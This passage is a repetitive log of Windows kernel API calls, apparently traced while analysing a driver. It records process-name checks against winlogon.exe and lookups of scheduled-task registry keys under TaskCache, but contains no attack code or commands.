| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8e80830, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8e80830, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8e80830, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x142, ret_val_ptr_out = 0xffffe0003a770eb0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x140, ret_val_ptr_out = 0xffffe0003a785ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x140, ObjectNameInfo_unk_out = 0xffffe0003a785ec0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\User_Feed_Synchronization-{447529D0-7CBF-4A66-92FE-00C87AC907BC} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a785ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a770eb0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
